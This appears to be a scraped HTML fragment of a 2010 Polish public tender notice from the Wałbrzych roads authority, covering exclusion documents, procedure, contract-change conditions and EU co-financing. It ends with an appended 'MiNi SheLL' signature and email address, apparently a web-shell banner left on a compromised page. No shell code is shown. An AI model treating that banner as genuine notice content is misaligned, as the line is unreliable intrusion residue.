<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmianę zawartej Umowy 
w stosunku do treści oferty Wykonawcy, na podstawie określonych poniżej warunków:
1)	zmiany dokonane według zasad określonych w Klauzuli 13 Warunków Kontraktowych FIDIC;
2)	zmiana dokonana na podstawie art. 23 pkt 1 ustawy Prawo budowlane zmiana 
w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy;
3)	zmiana dokonana na podstawie art. 20 ust. 1 pkt 4 lit. b) ustawy Prawo budowlane uzgodniona możliwość wprowadzenia rozwiązań zamiennych
w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego;
4)	zmiany dokonane zostały podczas wykonywania robót i nie odstępują w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę
w ramach art. 36a ust. 5 ustawy Prawo budowlane i dokonane zostały zgodnie
z zapisami art. 36a ust. 6 ustawy Prawo budowlane, spełniając zapisy art. 57 ust. 2 ustawy Prawo budowlane;
5)	zmiana wynagrodzenia Wykonawcy w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki procentowej należnego podatku VAT.
6)	wystąpienie siły wyższej  określonej w Klauzuli 19 Warunków Kontraktowych FIDIC.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdik.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Komunikacji w Wałbrzychu, ul. Armii Krajowej 35,58-302 Wałbrzych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2010 godzina 10:00, miejsce: Zarząd Dróg i Komunikacji w Wałbrzychu, ul. Armii Krajowej 35,58-302 Wałbrzych, pok. 108.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu  Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 oraz z budżetu Gminy Wałbrzych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com